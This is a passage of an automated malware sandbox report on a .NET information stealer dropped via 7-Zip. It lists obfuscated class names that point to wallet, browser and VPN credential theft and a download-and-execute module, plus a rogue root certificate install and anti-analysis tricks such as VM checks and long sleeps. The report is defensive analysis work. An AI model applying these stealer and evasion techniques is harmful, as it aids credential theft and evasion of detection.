                        Source: in.exe.9.dr, Entity5.csHigh entropy of concatenated method names: 'AoQNvT9gkGq49b9V3q4', 'O0Zde79RujDIPB821od', 'hEZ5mf91r2oc5ZAPeUE', 'ycyFo790aDKQM1Q6H8L', 'byTa009EcamPN9dodKZ', 'wWJkep9LRAHN4NSGkXH', 'N1pP8O9GAX2sX78iQwk'
                        Source: in.exe.9.dr, Arrays.csHigh entropy of concatenated method names: 'AreEqual', 'AreEqual', 'AreEqual', 'AreSame', 'ConstantTimeAreEqual', 'AreEqual', 'HaveSameContents', 'HaveSameContents', 'HaveSameContents', 'HaveSameContents'
                        Source: in.exe.9.dr, GdiHelper.csHigh entropy of concatenated method names: 'GetVirtualDisplaySize', 'GetImageBase', 'ConvertToBytes', 'wIOvq3BGfAQQqXTBbUp', 'vAjhnBBr7K8gLbrkZTp', 'xaZRw3BlngZ78y5EVoG', 'brAeWSBSQt8395R9VJB', 'eekfj3BEPUxlDVuXwUE', 'yVDpbnBL2o9JmKDuDcq', 'rARwxNBidHQ503XyZ1r'
                        Source: in.exe.9.dr, TaskResolver.csHigh entropy of concatenated method names: 'ReleaseUpdates', 'UVhKQxCnahGmHFEdwSR', 'EeXrODCTEwU8wffCYkF', 'kbbBkcC1XCsIfxY1WXf', 'xXGYKBC0ik9csHuNywP', 'zSHENZCgU91hNlPsy3e', 'sqO3ISCYJuunvuBFDPO', 'wMLqroCOSDE4SVBomXK', 'BtMttxCRu5y2lLh97vF'
                        Source: in.exe.9.dr, DownloadAndExecuteUpdate.csHigh entropy of concatenated method names: 'IsValidAction', 'Process', 'umfM6RVKeT7kfdHvKVi', 'WHHMcGVb2tr9voscSld', 'g773edVDjc8WIpasmI0', 'Hk0hycVck12w9OX8rYm', 'EJu6RNVx5KBqeDkItP4', 'P5L9wFVzXwc7OHHsHnu', 'IGYCydCyrDlddWN7ffA', 'O08YxgCqlMTGeagxuDL'
                        Source: in.exe.9.dr, DownloadUpdate.csHigh entropy of concatenated method names: 'IsValidAction', 'Process', 'g6H26UCCDFQ8dT01dQC', 'CO6IF5CBLKRKhbTUdqC', 'eH7ceJCe1Z2cxhwQ8OP', 'VphRnrC2qEjlEKlVOxA', 'xRfE2lC9Zqm79ntGs29', 'Kk6vYTC6smQJrFbJiZi', 'xxobNBCjWdkP2Evhmi7', 'beg4lkCQ5A4WWFmqS3Z'
                        Source: in.exe.9.dr, FileCopier.csHigh entropy of concatenated method names: 'FindPaths', 'ChromeGetName', 'ChromeGetRoamingName', 'ChromeGetLocalName', 'JobWWJ2uN6u0qlNjjAY', 'm32Vm92tMtw0nCjNGWS', 'W74sNV24UQHsyok8nK5', 'f9rjkQ2ANZL248wlZv0', 'CXg7Cg2M9qU3V31tlts', 'xUAZqd2sndRjWeElwGt'
                        Source: in.exe.9.dr, KeyParameter.csHigh entropy of concatenated method names: 'GetKey', 'kOZ46GN0jUNnFfTh97t', 'aVWlp7Ng8QM78XbP6f0', 'K0RcSENRv6a6GMc35qj', 'iM4vhiNT75nlO0EVyWB', 'A0j8obN1doEP5wLIxuJ', 'eMfa4cNEgiw2QFgL1LV', 'xgJSStNL7HaoFfuVCoG'
                        Source: in.exe.9.dr, Entity18.csHigh entropy of concatenated method names: 'Id1', 'TreeObject8', 'Id2', 'Id3', 'Id4', 'Id5', 'Id6', 'Id7', 'Id8', 'PPyBCqqM0kO7aQsRVjP'
                        Source: in.exe.9.dr, MemoryCollect.csHigh entropy of concatenated method names: 'Id1', 'Id2', 'Id3', 'Id4', 'nV2LcJfEddUnAMLVNta', 'G31G90fL6OVspraOVbA', 'KX6mmPfG6hBL4iT0kvG', 'HxuVaNfgwE1bfkxEb7b', 'PgYyqdfR87EwPfhrknm', 'm5jJHsfrMUOZsVlPauh'
                        Source: in.exe.9.dr, RosComNadzor.csHigh entropy of concatenated method names: 'Id2', 'Id3', 'UV579RXO7Rdpqrnjo7V', 'xS2AdMXnxGaD3Cd4d39', 'bR4dRnXTMj0Mvby8HLX', 'YpEhrqX1vlHYiFl1wgB', 'kxTkuNX0FrXxUEjal8v', 'SlhQaAXgPnRs0QicSHS', 'lyUwHXXRmbuV39PT4pW', 'ynpXu3XEiebanftlxyu'
                        Source: in.exe.9.dr, Resource1.csHigh entropy of concatenated method names: 'mBXCbR6CtT8O15SKDK4', 'D1HjCE6B6v5piSi1vZs', 'bcVFVY6XVxuUhatpUMY', 'zJEsc76VSXEpnbncllS', 'J8XWx96eRBwAehudMTw', 'rg0BEn62HnQc6IW5ywY', 'dgUetJ698K1bERHwLPr', 'UH7NDx66UJQdB0i37TS', 'SyK7yL6jDXQyvr9C2jY', 'ofyTi86QXKv9GQHFvQi'
                        Source: in.exe.9.dr, OpenVPN.csHigh entropy of concatenated method names: 'Id2', 'Id3', 'QZngY2XIjDyrAvn3vvp', 'ldVD9YXWquL1nOByJlV', 'uMBgbsXJp8CFTcPBQr4', 'U58PiMXPetLusgWu6WI', 'aGhmxYXodRLKfJxQ0UA'
                        Source: in.exe.9.dr, ConnectionProvider.csHigh entropy of concatenated method names: 'Id1', 'RequestConnection', 'Id3', 'Id4', 'Id5', 'Id6', 'Id7', 'Id8', 'Id9', 'Id10'
                        Source: in.exe.9.dr, CryptoHelper.csHigh entropy of concatenated method names: 'Read', 'DecryptBlob', 'CalcM5', 'GetHexString', 'zf6Vbhf56kCPrCaBGKV', 'BJctOCfdeOnyZUwTZUw', 'Qe6nk7fHL6bQuF67F9w', 'pDMsv1fIAeI5LgLP0I9', 'E0K8q9fWb3OTl8MsZGt', 'BRJvoHfJiWoAdYBkeQu'
                        Source: in.exe.9.dr, Program2.csHigh entropy of concatenated method names: 'WriteLine', 'tfOeKgFUphRMPGbYVHR', 'M1rNf1FFpdLNxRsvQxF', 'y2IdidFwk6mb0jl0b2E', 'h3XwAPFXIdwW0qOntkd', 'b6vRgAFVf7GvcfappQ8', 'ycf65jFCH6NMOeoMGYX', 'Vi8cD7FBw3kbJcwfhUt', 'ttg3ruFe8Q0EbCp8F4F', 'xHSwHLF2c3D0Kr9uW9X'
                        Source: in.exe.9.dr, StringExt.csHigh entropy of concatenated method names: 'ChangeType', 'StripQuotes', 'Run', 'CiRs0DCoeWMo2gJpGMf', 'DIbiGtC35NrGHaATcLg', 'pGhGy3CJwDhY2SNTjsI', 'HfJJbuCPbUAr571xA3P', 'SgfwSDCm0TpN5D0bolZ', 'VyaYQiCKvvQkJOjvVbX', 'TZ9sIlCbhPBeKD0VLlH'
                        Source: in.exe.9.dr, AllWallets.csHigh entropy of concatenated method names: 'Id2', 'Id3', 'zdnfMEXweiDdHO1jqrM', 'E3EDfdXXoD8Tw9Ob6iR', 'iBqgSgXVwghODKoX9MG', 'zrb0ZsXCCMy9sBqTu16', 'PPE6uUXBvBqA4fUtRCN', 'bJb3sXXUHBasLi5mcrU', 'GBJrXwXF01r2V8DRSKt', 'c1GgwjXe4IEdJvwI1mP'
                        Source: in.exe.9.dr, EwV3ECxYhIse1SOarW.csHigh entropy of concatenated method names: 'MBXvWU1F3hP6XNq0rkA', 'NW9UUy1wd9TCaRccFBw', 'BPTavEfPI8', 'au0CYU1BGY2DPwLwkDH', 'mM5ihe1eBIaSZ8auFPB', 'pRLGxD12Bx6xx8PmEto', 'RxYbT319N52nKWN9dJP', 'OPRxDU163sBLCmxKepd', 'IqlOou1jsgumLF329fw', 'PJvuON1Q9rDebIpFDcZ'
                        Source: in.exe.9.dr, Kp3eZNOyNqfl614RmD.csHigh entropy of concatenated method names: 'l5dizeUqZ0', 'ev6hyTNPTs', 'NY5wFA1M9ZEj0REWEBE', 'lUCGvK1s54bO38F8Gr8', 'UWF1Ri1ufgMUXTIaClZ', 'vIpqsD1tI7puyFNB2dQ', 'mbU9PU148JR0clJnJor'
                        Source: in.exe.9.dr, geUwbRLwd0WNm7K3QP.csHigh entropy of concatenated method names: 'N8ciDNtrkD', 'UJfDNHTmFZ2YPk9V7WW', 'jkvbVDTK9miyxW3WC50', 'cm1hhqTbL5xHO8T9Zj5', 'xZeWmSTDOMaifpNRdd6', 'Y4qOZFTcAJmrLPHA1le', 'kZc5OUToldwtdWWbhxH', 'tJFaqBT3JJJvKFahByx', 'epnHXdTxnLhwwsgC8yl', 'LDIKtBTzOINIe5yoVBC'
                        Source: in.exe.9.dr, OBqe2IUAeSpOmlOQ4O.csHigh entropy of concatenated method names: 'nOQdl4ODOg', 'tY3dXGtH5f', 'q9qdvQao7g', 'DpYddoq5nS', 'vUcduRRnlL', 'sqedUSL72O', 'MNddRugcTR', 'd6IBJRRp2Z', 'c8idQhNv3S', 'V1kdEyl02V'
                        Source: in.exe.9.dr, itVrv600AOcMBhsiIT.csHigh entropy of concatenated method names: 'xdJaHaLaiy', 'V2DaSkpaDo', 'ojWablkBNc', 'DyHamcAFke', 'ArCa6Di0WB', 'EJyataZqWW', 'T7haJgpFAl', 'kNGa25aRtf', 'lj7acrWjTB', 'PYIahvCHho'
                        Source: in.exe.9.dr, DefaultConstants.csHigh entropy of concatenated method names: 'C1MC12QztsQ32HPQOnL', 'lvBXuwZyrEsMLi75owM', 'q6I9q0ZqCGeKWIvUC0X', 'U0oRTyZfwgUSKj3CjDm', 'N5VjrGZNmoi2kDhW361', 'vqxLroZ8vhtNtCTl798', 'hJVDxOQcsITxFU03w4B', 'avbJw9QxjlVaGc51U4i'
                        Source: in.exe.9.dr, RECT.csHigh entropy of concatenated method names: 'Ceiling', 'FromLTRB', 'GetNumericListSeparator', 'Inflate', 'Inflate', 'Intersect', 'Offset', 'Parse', 'Round', 'Truncate'
                        Source: in.exe.9.dr, XRails_Container.csHigh entropy of concatenated method names: 'IsOverTitleBarIcon', 'OnSizeChanged', 'OnTextChanged', 'OnMouseDown', 'OnMouseDoubleClick', 'OnMouseMove', 'OnMouseUp', 'CreateHandle', 'OnPaint', 'jyQqJmZzTIoraKmhKB6'
                        Source: in.exe.9.dr, XRails_TextBox.csHigh entropy of concatenated method names: '_Click', '_Enter', '_Leave', '_KeyDown', '_KeyUp', '_KeyPress', 'WatermarkContainer_Click', 'WatermarkContainer_Paint', 'OnFontChanged', 'OnForeColorChanged'
                        Source: in.exe.9.dr, XRails_LinkLabel.csHigh entropy of concatenated method names: 'OnMouseDown', 'OnMouseMove', 'OnMouseLeave', 'OnInvalidated', 'cQV4Jq7meYAHaBMf9Ry', 'FI7OFd7K2L3yig8Nyfm', 'V0j8Jw7bZmYHXL5aKwP', 'qp6U287DtnN8ZpoMZla', 'YKP8QC7cMvJTVVGuWa8', 'zW4lAP7xEI32PXx0WSW'
                        Source: in.exe.9.dr, XRails_LogoBox.csHigh entropy of concatenated method names: 'OnPaint', 'EMvD9pp6NJZbCDTmUUO', 'USG90ypjxSS504sXcpn', 'Jq4sn1pQfYt12mXxtPd', 'IOlABhpZb3ZVR4ivZNc', 'Jx2PPFpkSKTkYvWvIrx', 'oo3Yt2p7R0sa4KNpkUe', 'bFilkNpp49BM8VIRyyW', 'ig6p1Tp2ueuk1TkS3MY', 'JdBU45p9tpl47k4Idxy'
                        Source: in.exe.9.dr, XRails_Label.csHigh entropy of concatenated method names: 'OnMouseDown', 'jgaB2R7goqSEAC8wkVZ', 'Q1749q7R3UxBYOrD2Km', 'efTsff7ENTFRKQbK1BH', 't3A7V57LFxooyRlCPr0', 'bXaMXh7G3rglNOagkNl', 'bcEGSt7r1k9GJfKEB3I', 'ODTRGQ716w3nvJ70jSW', 'nyXiYM700hAHi3N7v88', 'dZG8QR7lhMrV7hyT6cU'
                        Source: in.exe.9.dr, XRails_LeftPanel.csHigh entropy of concatenated method names: 'OnMouseDown', 'RUIJSV7MKDcYOndtn0B', 'u141kV7s6G77pyncm4N', 'qbGdKZ7u6E4Z7HlsRqY', 'dluxQU7tcNKSCRhSWLl', 'cIjoLB7485quTjRCcHP', 'NKmF7a7AE8Q8wmEiDPo', 'ILUeMZ75VvZ9P9RbkxF', 'mvXkU27deWa8gZqYcp6', 'rVPSib7HlqCJapUD1lC'
                        Source: in.exe.9.dr, XRails_RightPanel.csHigh entropy of concatenated method names: 'OnMouseDown', 'eowk7oprbN3raUvnQny', 'OEWUUOplocU7AfwedHw', 'EZBpSPpS9VGRxAmqND5', 'YFK10bpiShbk41h6wV4', 'kRC53NphFWBunYimtPB', 'pNaoqUpMkfqWviI0PJp', 'vwPy5lpLWlWd4cOQ9dD', 'mMt9itpGS1214lwx9sh', 'dDo9iHpsvgliF4D5UT8'
                        Source: in.exe.9.dr, XRails_ControlBox.csHigh entropy of concatenated method names: 'OnResize', 'OnMouseMove', 'OnMouseLeave', 'OnMouseDown', 'OnMouseUp', 'OnCreateControl', 'OnPaint', 'nMlvT2kP1J3fN94PV15', 'CdO9TCkoZrhHfXSfYtK', 'TwXXhQk3oODLYsQeuTX'
                        Source: in.exe.9.dr, XRails_TitleLabel.csHigh entropy of concatenated method names: 'OnMouseDown', 'OnPaint', 'U3ElydvH5FnBj9chqrn', 'QlaiGxvIysaV3VOXHgS', 'SrIMfcvWptHatp6m2s8', 'iXATwxvJjE8L9m6TY9C', 'XwVEFhvPVNlkSkvQTo6', 'YM7wB4volJ0XHDYdQ9J', 'IGadDMv3KExhDRwQDdC', 'RB5mptvmX4ZtU00DFO1'
                        Source: in.exe.9.dr, XRails_Button.csHigh entropy of concatenated method names: 'NotifyDefault', 'PerformClick', 'RoundedRect', 'OnMouseUp', 'OnMouseDown', 'OnMouseMove', 'OnMouseLeave', 'OnTextChanged', 'OnHandleCreated', 'OnResize'

                        Persistence and Installation Behavior

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 BlobJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeJump to dropped file
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.exeJump to dropped file
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeMemory allocated: E50000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeMemory allocated: 28C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeMemory allocated: 2650000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeWindow / User API: threadDelayed 1232Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeWindow / User API: threadDelayed 797Jump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeAPI coverage: 5.1 %
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exe TID: 5764Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exe TID: 1020Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_0040367D
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_004031DC
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_00457978 FindFirstFileW,FindFirstFileW,free,5_2_00457978
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0045881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,5_2_0045881C
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0045B5E0 GetSystemInfo,5_2_0045B5E0
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
